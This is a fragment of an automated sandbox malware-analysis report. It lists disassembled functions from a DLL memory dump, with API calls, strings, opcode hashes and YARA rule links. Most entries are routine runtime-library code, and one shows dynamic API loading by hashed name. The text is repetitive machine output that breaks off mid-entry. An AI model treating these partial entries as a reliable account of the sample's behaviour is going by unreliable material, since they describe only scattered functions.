Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 32b4a5c23fef1006bbdc7b13116d28124a9c9a34bd357b2c8c647d3624dedb5a
Instruction ID: 5a26f045c351e2ea820e469ce56d936854a3068ce42865c6002c56de3f984e3a
Opcode Fuzzy Hash: 32b4a5c23fef1006bbdc7b13116d28124a9c9a34bd357b2c8c647d3624dedb5a
Instruction Fuzzy Hash: B651B4313011449FD734DE5CDA80A5AB3EAEBD5395B248E2DE865C7B84D770E84287A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C911B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6C911C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6C911C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6C911CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C911CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6C911CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6C911D0A

Strings

kernel32.dll, xrefs: 6C911CBA, 6C911CC7
User32.dll, xrefs: 6C911C57, 6C911C64

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: d72840fec079620fccc19c6701af6c23132b17cbbd1efe6783eb6f81a9708d21
Instruction ID: 837a477f13ae13acd97489356043875cd2440840e22272021b92ad916f3ffebb
Opcode Fuzzy Hash: d72840fec079620fccc19c6701af6c23132b17cbbd1efe6783eb6f81a9708d21
Instruction Fuzzy Hash: 2D616D74208B04AFD720CF19C192A6ABBF1FB67700F60891CD4D68BE52D736E946CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6C954409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6C95442E

Part of subcall function 6C953FC9: Replicator::operator[].LIBCMT ref: 6C95404C
Part of subcall function 6C953FC9: DName::operator+=.LIBCMT ref: 6C954054

DName::operator+.LIBCMT ref: 6C954487
DName::DName.LIBCMT ref: 6C9544DF

Strings

,..., xrefs: 6C954473
<ellipsis>, xrefs: 6C9544C9, 6C9544CE
,<ellipsis>, xrefs: 6C95447A, 6C95447F
void, xrefs: 6C9544D7
..., xrefs: 6C9544C2

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 87e0e32a90f848f23374728f7251241f4a70e05bbb7b9ea4320d618e94cec38c
Instruction ID: bb3bd9fb77318f92540fda7283b8693e8778dc3412a4cc5fde2beb227df66c77
Opcode Fuzzy Hash: 87e0e32a90f848f23374728f7251241f4a70e05bbb7b9ea4320d618e94cec38c
Instruction Fuzzy Hash: 8C21B0B1209209AFDF01DF59C440AA97BF8EB4638DB5482A6E845CFB56CB30D923CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6C955D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6C955D40
DName::DName.LIBCMT ref: 6C955D4C

Part of subcall function 6C953B3B: DName::doPchar.LIBCMT ref: 6C953B6C

UnDecorator::getScopedName.LIBCMT ref: 6C955D8B
DName::operator+=.LIBCMT ref: 6C955D95
DName::operator+=.LIBCMT ref: 6C955DA4
DName::operator+=.LIBCMT ref: 6C955DB0
DName::operator+=.LIBCMT ref: 6C955DBD

Strings

void, xrefs: 6C955D9C

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: c60a5b2667ef9807ebf9d5c2603f4bd1160f51c0ed8ba1213098f6f932c1797c
Instruction ID: a0dfa72356e7f3bdfde0ad32b627a298ab052b019896cf536136681e1eaec6b3
Opcode Fuzzy Hash: c60a5b2667ef9807ebf9d5c2603f4bd1160f51c0ed8ba1213098f6f932c1797c
Instruction Fuzzy Hash: DB11E971501204AFD704DB78C888BEC7BB4AF21318F804099D4159BBD5DB30DA6ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 6C903F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C903F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C903F8D
VariantInit.OLEAUT32(?), ref: 6C903FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C903FD0
VariantClear.OLEAUT32(?), ref: 6C9040C9
VariantClear.OLEAUT32(?), ref: 6C904105
SafeArrayDestroy.OLEAUT32(?), ref: 6C904123
VariantClear.OLEAUT32(?), ref: 6C904157
VariantClear.OLEAUT32(?), ref: 6C904168

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: 18c2c490b531159cd96aff6c7475db98e72fa711c224997eeef77892099fe486
Instruction ID: 680d13bd8a3789ab3d8665fce997472879aa92dabf0bd50a9f21811c0485e0c0
Opcode Fuzzy Hash: 18c2c490b531159cd96aff6c7475db98e72fa711c224997eeef77892099fe486
Instruction Fuzzy Hash: 827169722093819FD700DFA8C8C496BBBF9BFA9304F144A6CF69597650C731E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C9442B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C9442DD

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C944363
_memmove.LIBCMT ref: 6C944381
_memmove.LIBCMT ref: 6C9443E6
_memmove.LIBCMT ref: 6C944453
_memmove.LIBCMT ref: 6C944474

Strings

vector<T> too long, xrefs: 6C9442D8

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: 9bc4a0185e46c099a5838154c7cccc516379a3a99b7dbb03c93bc589097805cf
Instruction ID: 942416ade92c5fc4abe067b8b77800101c2e845a4f8702c91cd1def12e80d262
Opcode Fuzzy Hash: 9bc4a0185e46c099a5838154c7cccc516379a3a99b7dbb03c93bc589097805cf
Instruction Fuzzy Hash: 525173B17042068FC718CF78DD8596BB7E9EBE4214F188E2DE846C3744E671E904CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C914B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C914BC8
std::_Xinvalid_argument.LIBCPMT ref: 6C914BE0
std::_Xinvalid_argument.LIBCPMT ref: 6C914BFA
_memmove.LIBCMT ref: 6C914C64
_memmove.LIBCMT ref: 6C914C81

Strings

string too long, xrefs: 6C914BDB, 6C914BF5
invalid string position, xrefs: 6C914BC3

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 6c580c97dbe904d1677422cbdbb723cf51c6a36ecd174715a4f1c6575754da52
Instruction ID: 18af0306759d0f90fa3d7eb37ec0a967f1411b83e87604d585c821ab9eba960c
Opcode Fuzzy Hash: 6c580c97dbe904d1677422cbdbb723cf51c6a36ecd174715a4f1c6575754da52
Instruction Fuzzy Hash: C141B5323492198BD324CE1CD981ABEF3E9DBD971DB210A2EF05287E80D721DC458B61

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FFFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RSDi, xrefs: 6C900075

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSDi
API String ID: 4225690600-559181253
Opcode ID: cbf827cdadbdb734ff0b0eb8483db492df1d1333a5decd95784ab4e275bde20f
Instruction ID: c1626da4d12146b7d8849c3cc697c11f33638e72b71c61c3e2c24c68c920a497
Opcode Fuzzy Hash: cbf827cdadbdb734ff0b0eb8483db492df1d1333a5decd95784ab4e275bde20f
Instruction Fuzzy Hash: 56414974B01A08DFCB00DFA9C984A5AB7FEAF89304F20858AE509DB755DB31E841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C900815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RSUa, xrefs: 6C900864

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: 2eccf7a52f426b50c8abe1a1216ec3c4663652327a72f34a83b3c6c1b9025b6e
Instruction ID: c4ace9e658a6d58999b9257b5f9034f26d627206e7c0c0af7b1925aec24a3fc5
Opcode Fuzzy Hash: 2eccf7a52f426b50c8abe1a1216ec3c4663652327a72f34a83b3c6c1b9025b6e
Instruction Fuzzy Hash: 0C311970B01A189FDB00DF69C984B9EB7BDAF89304F20859AE518E7651CB71E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9006F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RSqb, xrefs: 6C900748

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: 8f60e9737b6fe4aefd7a24579f6ee9be812dd31e527424b064587cbb38cceb4f
Instruction ID: 739af77e8ca4ca219f01ab3ce1d3b89d4ee9aabea09f267bff7697c76e190b51
Opcode Fuzzy Hash: 8f60e9737b6fe4aefd7a24579f6ee9be812dd31e527424b064587cbb38cceb4f
Instruction Fuzzy Hash: 01314B70B01A189FCB00DFA9CD84B9DB7BDAF89704F20859AE518E7641DB75D981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C900787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RSa, xrefs: 6C9007D6

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSa
API String ID: 4225690600-3169278968
Opcode ID: 1ea5bce6490ad4b8d0395a8d9f6bf58d341d72be95c79e1f3c027c0a61de73c1
Instruction ID: 4c98a0fdd3da828b16b2bd83595078071bf6a94adedd11f817ffecb2ac879e8a
Opcode Fuzzy Hash: 1ea5bce6490ad4b8d0395a8d9f6bf58d341d72be95c79e1f3c027c0a61de73c1
Instruction Fuzzy Hash: 00313B70B01A189FCB00DFA9CD84B9DB7BDAF89704F20859AE518E7651C775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C90012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RS:h, xrefs: 6C90017F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS:h
API String ID: 4225690600-3891202347
Opcode ID: 1519340a3b3a1f07cca6f87cf73c3356cc8a95c3eb81637777b775378b3bf702
Instruction ID: d8be2489a9cbc339d2546c608caa48849fc020106a584d6571b93b1a299b237f
Opcode Fuzzy Hash: 1519340a3b3a1f07cca6f87cf73c3356cc8a95c3eb81637777b775378b3bf702
Instruction Fuzzy Hash: 00314D70F01A089FDB00DF69CC84B5EB7BEAF99204F20859AE418E7651C771D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C900237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Strings

RS3g, xrefs: 6C900286

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS3g
API String ID: 4225690600-2794631155
Opcode ID: 1e752da6a061c8dae1cdc2c8c6d476f9ff8dd01f9e473ba69aa3b2e926ea1070
Instruction ID: 7c9f58aca360186c0d0b7784c07abc01559c1bd47da275075a29f0b2e342ec91
Opcode Fuzzy Hash: 1e752da6a061c8dae1cdc2c8c6d476f9ff8dd01f9e473ba69aa3b2e926ea1070
Instruction Fuzzy Hash: 97313D70F01A189FCB00DFA9CD84B9DB7BDAF89604F20869AE518E7651CB71D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C93C760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6C93C7EB

Strings

